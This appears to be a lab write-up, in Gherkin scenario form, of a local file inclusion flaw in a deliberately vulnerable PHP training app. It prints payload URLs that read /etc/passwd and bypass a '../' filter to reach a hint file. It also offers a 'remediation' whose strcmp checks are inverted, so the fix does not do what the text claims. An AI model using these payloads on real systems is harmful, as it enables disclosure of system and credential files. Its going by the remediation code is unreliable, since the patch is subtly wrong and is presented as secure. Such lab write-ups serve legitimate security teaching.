## Version 1.4.1
## language: en

Feature:
  TOE:
    Vulnerable Web Application
  Category:
    Local File Inclusion
  Location:
    http://localhost:9991/www/FileInclusion/pages/lvl2.php
  CWE:
    CWE-98: Improper Control of Filename for Include/Require Statement
    in PHP Program ('PHP Remote File Inclusion')
  Rule:
    REQ.173: https://fluidattacks.com/web/rules/173/
  Goal:
    Read the file "hint2.php"
  Recommendation:
    Create a whitelist for allowed files

  Background:
  Hacker's software:
    | <Software name> | <Version>   |
    | Debian          | Buster      |
    | Firefox         | 68.9.0      |
  TOE information:
    Given I am accessing the site
    And a text box
    And The app is running on XAMPP 5.6.21

  Scenario: Normal use case
    Given a page with two common buttons
    And they have the text "Button","Other Button" respectively
    When I click on "Button"
    Then The page includes another page and says
    """
    Why Don't You Click the Other Button??
    1.php
    """
    When I click on "Other Button"
    Then The page includes another page and says
    """
    Did you notice anything changed?
          Browse the site.
              2.php
    """

  Scenario: Static detection
    When I watch the source code
    Then I can see a function inside the PHP code
    """
    if (isset( $_GET[ 'file' ]))
    {
      $secure2 = $_GET[ 'file' ];
      $secure2 = str_replace( array(  "..\\" , ".\\", " ./", "../"),
      "", $secure2 );
      $secure2 = str_replace( array( "http://" , "https://" ) ,"" ,
      $secure2 );
      if (isset($secure2))
      {
        @include($secure2);
        echo"<div align='center'><b><h5>".$secure2."</h5></b></div> ";
      }
    }
    """
    And As seen, some characters are deleted
    """
    "..\\" , ".\\", " ./", "../"
    """
    And open a file with the remaining characters if it exists
    And else does nothing

  Scenario: Dynamic detection
    When I try the URL with a local file
    """
    http://localhost:9991/www/FileInclusion/pages/lvl2.php?file=/etc/passwd
    """
    Then I get the content of the file "/etc/passwd"
    And [evidence](image1.png)

  Scenario: Exploitation
    Given I can read file
    And that the characters are removed
    """
    "..\\" , ".\\", " ./", "../"
    """
    When I try the URL with local file "../hint2/hint2.php"
    """
    http://localhost:9991/www/FileInclusion/pages/lvl2.php?
    file=.../...//hint2/hint2.php
    """
    Then I get the content of the file "../hint2/hint2.php"
    And I can conclude that the application has a weak filter

  Scenario: Remediation
    Given I have patched the code by doing
    """
    if (strcmp($_GET['file'],"1.php")){
      @include("1.php");
    }elseif (strcmp($_GET['file'],"2.php")){
      @include("2.php");
    }
    """
    Then the filter accepts only "1.php, 2.php"
    When I try the URL with local file "../hint2/hint2.php"
    """
    http://localhost:9991/www/FileInclusion/pages/lvl2.php?
    file=.../...//hint2/hint2.php
    """
    Then I don't receive an answer
    And the vulnerability is patched

  Scenario: Scoring
  Severity scoring according to CVSSv3 standard
  Base: Attributes that are constant over time and organizations
    5.3/10 (Medium) - AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
  Temporal: Attributes that measure the exploit's popularity and fixability
    5.3/10 (Medium) - E:H
  Environmental: Unique and relevant Attributes to a specific user environment
    5.3/10 (Medium) - MAV:N/MAC:L/MPR:N/MUI:N/MC:L

  Scenario: Correlations
    No correlations have been found to this date 2019-10-10
